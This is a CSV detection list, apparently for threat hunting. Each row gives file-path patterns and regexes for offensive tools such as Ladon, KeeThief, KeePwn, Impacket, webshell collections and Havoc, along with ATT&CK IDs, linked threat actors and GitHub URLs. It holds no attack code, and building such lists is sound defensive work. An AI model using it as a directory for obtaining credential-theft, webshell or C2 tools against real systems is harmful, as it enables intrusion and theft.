"*/k8gege520*",".{0,1000}\/k8gege520.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","8279"
"*/ka0tic.pl*",".{0,1000}\/ka0tic\.pl.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","8280"
"*/ka7ana/CVE*.ps1*",".{0,1000}\/ka7ana\/CVE.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","poc","Simple PoC in PowerShell for CVE-2023-23397","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","APT28 - STRONTIUM - Sednit - Sofacy - Fancy Bear","Exploitation tool","https://github.com/ka7ana/CVE-2023-23397","1","1","N/A","N/A","N/A","1","40","12","2023-03-16T19:29:49Z","2023-03-16T19:10:37Z","8281"
"*/KAdot Universal Shell v0.1.6.php*",".{0,1000}\/KAdot\sUniversal\sShell\sv0\.1\.6\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","8282"
"*/kali/pool/main/*",".{0,1000}\/kali\/pool\/main\/.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","8283"
"*/kalilinux/packages/winexe*",".{0,1000}\/kalilinux\/packages\/winexe.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","1","#linux #windows","N/A","8","8","N/A","N/A","N/A","N/A","8284"
"*/kali-linux-2023*",".{0,1000}\/kali\-linux\-2023.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","8285"
"*/kali-tools-*",".{0,1000}\/kali\-tools\-.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","8286"
"*/karmaSMB.exe*",".{0,1000}\/karmaSMB\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","8287"
"*/karmaSMB.py*",".{0,1000}\/karmaSMB\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","8288"
"*/katoolin3*",".{0,1000}\/katoolin3.{0,1000}","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/s-h-3-l-l/katoolin3","1","1","#linux","N/A","N/A","4","370","120","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z","8289"
"*/KaynLdr.git*",".{0,1000}\/KaynLdr\.git.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","1","N/A","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","8290"
"*/KaynStrike.cna*",".{0,1000}\/KaynStrike\.cna.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","1","N/A","N/A","9","5","422","66","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z","8291"
"*/KaynStrike.git*",".{0,1000}\/KaynStrike\.git.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","1","N/A","N/A","9","5","422","66","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z","8292"
"*/KCMTicketFormatter*",".{0,1000}\/KCMTicketFormatter.{0,1000}","offensive_tool_keyword","KCMTicketFormatter","Format SSSD Raw Kerberos Payloads into CCACHE files for use on Windows systems","T1558.003 - T1550.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/blacklanternsecurity/KCMTicketFormatter","1","0","#linux","N/A","7","1","37","4","2021-05-26T20:23:56Z","2021-05-26T20:17:33Z","8293"
"*/kdstab.*",".{0,1000}\/kdstab\..{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","8294"
"*/KDStab.*",".{0,1000}\/KDStab\..{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","8295"
"*/KDStab/*",".{0,1000}\/KDStab\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","8296"
"*/KeeFarce.exe*",".{0,1000}\/KeeFarce\.exe.{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","1","N/A","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","8297"
"*/KeeFarce.git*",".{0,1000}\/KeeFarce\.git.{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","1","N/A","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","8298"
"*/KeeFarceDLL.dll*",".{0,1000}\/KeeFarceDLL\.dll.{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","1","N/A","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","8299"
"*/keepass_discover.py*",".{0,1000}\/keepass_discover\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","8300"
"*/keepass_discover_*.txt*",".{0,1000}\/keepass_discover_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","8301"
"*/keepass_trigger.py*",".{0,1000}\/keepass_trigger\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","8302"
"*/keepwn.core.*",".{0,1000}\/keepwn\.core.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","8303"
"*/KeePwn.git*",".{0,1000}\/KeePwn\.git.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","1","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","8304"
"*/KeePwn.py*",".{0,1000}\/KeePwn\.py.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","1","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","8305"
"*/keepwn.utils.*",".{0,1000}\/keepwn\.utils.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","8306"
"*/KeePwn/keepwn/*",".{0,1000}\/KeePwn\/keepwn\/.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","1","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","8307"
"*/KeePwn/tarball/*",".{0,1000}\/KeePwn\/tarball\/.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","1","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","8308"
"*/KeePwn/zipball/*",".{0,1000}\/KeePwn\/zipball\/.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","1","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","8309"
"*/KeePwn-0.3/*",".{0,1000}\/KeePwn\-0\.3\/.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","8310"
"*/KeeTheft.exe*",".{0,1000}\/KeeTheft\.exe.{0,1000}","offensive_tool_keyword","KeeTheft","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","KeeTheft","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8311"
"*/KeeTheft.exe*",".{0,1000}\/KeeTheft\.exe.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","8312"
"*/KeeTheft.exe*",".{0,1000}\/KeeTheft\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","KeeTheft","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8313"
"*/KeeThief.git*",".{0,1000}\/KeeThief\.git.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","8314"
"*/KeeThief.git*",".{0,1000}\/KeeThief\.git.{0,1000}","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","1","N/A","private github repo","10","","N/A","","","","8315"
"*/KeeThief.ps1*",".{0,1000}\/KeeThief\.ps1.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","8316"
"*/kekeo.exe*",".{0,1000}\/kekeo\.exe.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","8317"
"*/kematian.exe*",".{0,1000}\/kematian\.exe.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github.com/Pirate-Devs/Kematian","1","1","N/A","N/A","10","1","N/A","N/A","N/A","N/A","8318"
"*/kerberoast.*",".{0,1000}\/kerberoast\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","8319"
"*/kerberoast.c*",".{0,1000}\/kerberoast\.c.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","8320"
"*/kerberoast.c*",".{0,1000}\/kerberoast\.c.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","8321"
"*/kerberoast.h*",".{0,1000}\/kerberoast\.h.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","8322"
"*/kerberoast.py*",".{0,1000}\/kerberoast\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","8323"
"*/kerberoast/*.*",".{0,1000}\/kerberoast\/.{0,1000}\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","8324"
"*/kerberoast_hashes_*.txt*",".{0,1000}\/kerberoast_hashes_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","8325"
"*/kerberoastables.txt*",".{0,1000}\/kerberoastables\.txt.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#linux","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","8326"
"*/KerberOPSEC.git*",".{0,1000}\/KerberOPSEC\.git.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","1","N/A","N/A","10","2","191","21","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z","8327"
